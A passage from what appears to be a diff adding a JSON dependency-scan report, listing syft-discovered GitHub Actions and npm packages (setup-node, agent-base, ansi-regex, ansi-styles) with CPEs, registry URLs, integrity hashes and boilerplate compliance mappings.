"Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "94c6b30301562d90", + "name": "actions/setup-node", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c207c7fc955b5ded", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/stream-shift/.github/workflows/test.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v3", + "title": "actions/setup-node v3", + "description": "Package discovered: actions/setup-node v3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c1170e00c0039987", + "name": "actions/setup-node", + "version": "v3", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/stream-shift/.github/workflows/test.yml", + "accessPath": "/node_modules/stream-shift/.github/workflows/test.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v3", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v3" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "751a614666804651", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/reusify/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v4", + "title": "actions/setup-node v4", + "description": "Package discovered: actions/setup-node v4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "de6527b74c32bd7a", + "name": "actions/setup-node", + "version": "v4", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/reusify/.github/workflows/ci.yml", + "accessPath": "/node_modules/reusify/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v4", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v4" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "87ee223622bbf049", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: agent-base 6.0.2", + "title": "agent-base 6.0.2", + "description": "Package discovered: agent-base 6.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "12d1ed2dd95a1a7c", + "name": "agent-base", + "version": "6.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/agent-base@6.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3360c58589af5938", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: agent-base 7.1.4", + "title": "agent-base 7.1.4", + "description": "Package discovered: agent-base 7.1.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f7259be6132b188d", + "name": "agent-base", + "version": "7.1.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/agent-base@7.1.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "83a9e4994a4bae21", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ansi-regex 5.0.1", + "title": "ansi-regex 5.0.1", + "description": "Package discovered: ansi-regex 5.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "434b3315d409487e", + "name": "ansi-regex", + "version": "5.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ansi-regex@5.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "55dee429ce8d0ebc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ansi-regex 6.2.2", + "title": "ansi-regex 6.2.2", + "description": "Package discovered: ansi-regex 6.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "351fe1b55f0afa57", + "name": "ansi-regex", + "version": "6.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ansi-regex@6.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz", + "integrity": "sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "78d002033ed5f3df", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ansi-styles 4.3.0", + "title": "ansi-styles 4.3.0", + "description": "Package discovered: ansi-styles 4.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d7348151a8592cc2", + "name": "ansi-styles", + "version": "4.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ansi-styles@4.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5a3dc64757afbf1c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ansi-styles 6.2.3", + "title": "ansi-styles 6.2.3", + "description": "Package discovered: ansi-styles 6.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b7d3f8e2ee8c8206", + "name": "ansi-styles", + "version": "6.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ansi-styles@6.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz", + "integrity": "sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + 